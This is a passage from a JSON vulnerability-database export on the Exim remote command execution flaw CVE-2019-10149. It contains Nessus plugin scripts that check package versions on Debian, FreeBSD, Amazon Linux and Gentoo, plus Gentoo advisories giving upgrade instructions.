Improper validation of the recipient address in the deliver_message() function may result in the execution of arbitrary commands.", "cvss3": {}, "published": "2019-06-07T00:00:00", "type": "nessus", "title": "Debian DSA-4456-1 : exim4 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4456.NASL", "href": "https://www.tenable.com/plugins/nessus/125742", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4456. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125742);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"DSA\", value:\"4456\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"Debian DSA-4456-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. 
Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4456\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"exim4\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-base\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-config\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dev\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"eximon4\", 
reference:\"4.89-2+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:55", "description": "Exim team and Qualys report :\n\nWe received a report of a possible remote exploit. Currently there is no evidence of an active use of this exploit.\n\nA patch exists already, is being tested, and backported to all versions we released since (and including) 4.87.\n\nThe severity depends on your configuration. It depends on how close to the standard configuration your Exim runtime configuration is. The closer the better.\n\nExim 4.92 is not vulnerable.", "cvss3": {}, "published": "2019-06-07T00:00:00", "type": "nessus", "title": "FreeBSD : Exim -- RCE in deliver_message() function (45bea6b5-8855-11e9-8d41-97657151f8c2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:exim", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_45BEA6B5885511E98D4197657151F8C2.NASL", "href": "https://www.tenable.com/plugins/nessus/125749", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125749);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"FreeBSD : Exim -- RCE in deliver_message() function (45bea6b5-8855-11e9-8d41-97657151f8c2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Exim team and Qualys 
report :\n\nWe received a report of a possible remote exploit. Currently there is\nno evidence of an active use of this exploit.\n\nA patch exists already, is being tested, and backported to all\nversions we released since (and including) 4.87.\n\nThe severity depends on your configuration. It depends on how close to\nthe standard configuration your Exim runtime configuration is. The\ncloser the better.\n\nExim 4.92 is not vulnerable.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.exim.org/static/doc/security/CVE-2019-10149.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/45bea6b5-8855-11e9-8d41-97657151f8c2.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?48eb73b3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim>=4.87<4.92\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:25:59", "description": "A flaw was found in Exim versions 4.87 to 4.91 before release 1.20 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution. 
(CVE-2019-10149)", "cvss3": {}, "published": "2019-06-07T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : exim (ALAS-2019-1221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:exim", "p-cpe:/a:amazon:linux:exim-debuginfo", "p-cpe:/a:amazon:linux:exim-greylist", "p-cpe:/a:amazon:linux:exim-mon", "p-cpe:/a:amazon:linux:exim-mysql", "p-cpe:/a:amazon:linux:exim-pgsql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2019-1221.NASL", "href": "https://www.tenable.com/plugins/nessus/125739", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2019-1221.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125739);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"ALAS\", value:\"2019-1221\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2019-1221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A flaw was found in Exim versions 4.87 to 4.91 before release 1.20\n(inclusive). Improper validation of recipient address in\ndeliver_message() function in /src/deliver.c may lead to remote\ncommand execution. 
(CVE-2019-10149)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2019-1221.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update exim' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"exim-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-debuginfo-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-greylist-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mon-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mysql-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-pgsql-4.91-1.20.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / exim-mon / exim-mysql / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:25:59", "description": "The remote host is affected by the vulnerability described in GLSA-201906-01 (Exim: Remote command execution)\n\n A vulnerability was discovered in how Exim validates recipient addresses in the deliver_message() function.\n Impact :\n\n A remote attacker could execute arbitrary commands by sending an email with a specially crafted recipient address to the affected system.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2019-06-07T00:00:00", "type": "nessus", "title": "GLSA-201906-01 : Exim: Remote command execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:exim", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201906-01.NASL", "href": "https://www.tenable.com/plugins/nessus/125751", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201906-01.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125751);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"GLSA\", value:\"201906-01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"GLSA-201906-01 : Exim: Remote command execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201906-01\n(Exim: Remote command execution)\n\n A vulnerability was discovered in how Exim validates recipient addresses\n in the deliver_message() function.\n \nImpact :\n\n A remote attacker could execute arbitrary commands by sending an email\n with a specially crafted recipient address to the affected system.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201906-01\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Exim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.92'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.92\"), vulnerable:make_list(\"lt 4.92\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2023-06-06T15:24:41", "description": "### Background\n\nExim is a message transfer agent (MTA) designed to be a highly configurable, drop-in replacement for sendmail. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Exim. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker, by connecting to the SMTP listener daemon, could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. Furthermore, a local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application or escalate privileges. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Exim users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.94.2\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "gentoo", "title": "Exim: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2021-05-04T00:00:00", "id": "GLSA-202105-01", "href": "https://security.gentoo.org/glsa/202105-01", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T15:03:38", "description": "### Background\n\nExim is a message transfer agent (MTA) designed to be a highly configurable, 
drop-in replacement for sendmail. \n\n### Description\n\nA vulnerability was discovered in how Exim validates recipient addresses in the deliver_message() function. \n\n### Impact\n\nA remote attacker could execute arbitrary commands by sending an email with a specially crafted recipient address to the affected system. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Exim users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.92\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-06T00:00:00", "type": "gentoo", "title": "Exim: Remote command execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-06T00:00:00", "id": "GLSA-201906-01", "href": "https://security.gentoo.org/glsa/201906-01", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": 